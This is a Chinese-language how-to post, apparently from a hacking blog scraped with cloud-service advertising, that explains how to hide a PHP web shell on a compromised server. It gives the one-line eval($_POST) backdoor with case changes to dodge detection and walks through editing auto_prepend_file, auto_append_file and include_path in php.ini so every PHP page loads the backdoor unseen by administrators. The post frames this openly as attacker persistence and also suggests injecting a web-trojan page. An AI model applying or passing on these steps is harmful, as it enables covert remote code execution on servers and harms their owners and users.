最近在看完了一個程式的代碼後又重新溫習了PHP中文手冊, 在看的過程中突然想到了一個隱藏後門的方法,拿來給大家分享下 嘿嘿:) 在入侵伺服器後如何能將後門做到不被管理員大叔發現這是很重要的。因此就出現了各種隱藏的方法,對於php來說大多是插入<?eval($ _POST[a]);? >或者include()函數隱藏然後修改檔案時間等等。網上多的很我就不在這羅嗦了。
在我們取得一個伺服器的最高許可權後我們可以通過修改伺服器的設定檔php.ini來達到我們隱藏後門的目的。修改系統目錄下面的php.ini檔案。在php.ini檔案第395-397和第420-424一段
圖1 圖2
根據手冊中關於auto_prepend_file和auto_append_file資料處理配置選項可以看出預設條件下是為空白的null 而且是e文解釋為Automatically add files before or after any PHP document.不用我翻譯了吧。如果我們將eval()函數的後門配置到php.ini檔案裡那麼網站上所有的PHP檔案將都會被include我們的後門。嘿嘿 當然是不可見的只是在解析的時候才include,當然管理員大叔也是發現不了的。因為後門已經隱藏看都看不到。
經過測試發現我們需要修改的php.ini設定檔的2個地方。3 圖4
第1步:
在圖3中修改設定添加我們eval()函數的後門的檔案名稱,後門檔案的名字一定要特別不能用index.php或者 config.php等網站上可能用到的檔案名稱。可以都添上也可以添一個。在此建議後門檔案就用<?eVal($_POST[a]);?> 最好將eval()函數大小寫變化下。
第2步:
看是什麼系統如果是win那麼就修改423-424 在此一定要注意
預設的配置幾乎和php內建的沒有任何改動
include_path = ".;c:\php\includes" 前面的 "."代表/目錄 而";"後面的目錄代表Automatically add files所有include檔案的目錄 。因此我們要配置隱藏後門要修改為
include_path = "d:\php\sapi;." 我們所要include的檔案目錄放在根目錄的前邊。不然的話apache會在根目錄下搜尋我們的後門(當然是沒有了從而導致伺服器解析php檔案失敗),作為設定檔當然要把include_path前面的";"去掉才會生效。然後重起服務就可以了。下面看看我們隱藏的後門啟動並執行情況 圖5
真是殺人於無形啊 所有伺服器網站下面的php檔案都可以被我們當作後門哦 嘿嘿 ! 關於其他環境的測試 在iis5.0 6.0測試通過。根據我個人看法只要伺服器支援php解析此法應該都可以測試成功。
後記:
關於利用php.ini設定檔來做後門當然也可以用來做點其他的東西,比如:include的檔案中如果是一個網頁木馬的網站呢或者是我們可以寫一個嚴格過濾惡意使用者提交的非法字元等等。就看你怎麼用了 好了就到這吧
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
